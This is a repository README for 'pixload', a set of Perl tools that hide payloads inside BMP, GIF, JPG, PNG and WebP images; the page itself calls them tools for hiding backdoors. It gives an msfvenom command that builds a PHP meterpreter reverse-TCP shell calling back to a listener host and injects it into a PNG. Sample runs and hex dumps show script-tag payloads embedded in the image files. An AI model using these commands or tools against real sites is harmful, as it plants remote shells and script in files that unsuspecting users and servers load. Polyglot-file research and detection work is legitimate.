pixload

by chinarulezzz

chinarulezzz / pixload

Image Payload Creating/Injecting tools

526 Stars 122 Forks Last release: Not found Do What The F*ck You Want To Public License 27 Commits 1 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:

pixload -- Image Payload Creating tools

DESCRIPTION

Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.

The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.

about

Useful references for better understanding of

pixload
and its use-cases:

If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend you to look here and here.

msfvenom

If you want to inject a metasploit payload, try something like this:

msfvenom -p php/meterpreter_reverse_tcp \
    LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
# Edit payload.php if need.
./pixload/png.pl -payload "$(cat payload.php)" -output payload.png

SETUP

The following Perl modules are required:

  • GD

  • Image::ExifTool

  • String::CRC32

On

Debian-based
systems install these packages:
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

On

OSX
please refer to this workaround (thnx 2 @iosdec).

Docker

docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload

TOOLS

bmp.pl

BMP Payload Creator/Injector.

Create a minimal BMP Polyglot Image with custom/default payload, or inject payload into existing image.

Usage
./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file exists, then the payload will be injected into the existing file. Else the new one will be created.

Example
./bmp.pl -output payload.bmp

[>| BMP Payload Creator/Injector |] Generating output file [✔] File saved to: payload.bmp

[>] Injecting payload into payload.bmp [✔] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1

00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/............| 00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |............../| 00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;......| 00000070 01 00 01 01 01 11 00 ff c4 00 14 00 01 00 00 00 |................| 00000080 00 00 00 00 00 00 00 00 00 00 00 00 03 ff da 00 |................| 00000090 08 01 01 00 00 00 01 3f ff d9 |.......?..| 0000009a

png.pl

PNG Payload Creator/Injector.

Create a PNG Image with custom/default payload, or inject payload into existing image.

The payload is injecting into IDAT data chunks.

Usage
./png.pl [-payload 'STRING'] -output payload.png

If the output file exists, then the payload will be injected into the existing file. Else the new one will be created.

Example
./png.pl -output payload.png

[>| PNG Payload Creator/Injector |] Generating output file [✔] File saved to: payload.png

[>] Injecting payload into payload.png

[+] Chunk size: 13 [+] Chunk type: IHDR [+] CRC: fc18eda3 [+] Chunk size: 9 [+] Chunk type: pHYs [+] CRC: 952b0e1b [+] Chunk size: 25 [+] Chunk type: IDAT [+] CRC: c8a288fe [+] Chunk size: 0 [+] Chunk type: IEND

[>] Inject payload to the new chunk: 'pUnk' [✔] Payload was injected successfully

payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced

00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR| 00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........| 00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......| 00000030 c4 01 95 2b 0e 1b 00 00 00 19 49 44 41 54 48 89 |...+......IDATH.| 00000040 ed c1 31 01 00 00 00 c2 a0 f5 4f ed 61 0d a0 00 |..1.......O.a...| 00000050 00 00 6e 0c 20 00 01 c8 a2 88 fe 00 00 00 00 49 |..n. ..........I| 00000060 45 4e 44 ae 42 60 82 00 00 00 00 00 00 00 00 00 |END.B`..........| 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000c0 00 1f 70 55 6e 6b 3c 73 63 72 69 70 74 20 73 72 |..pUnk

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.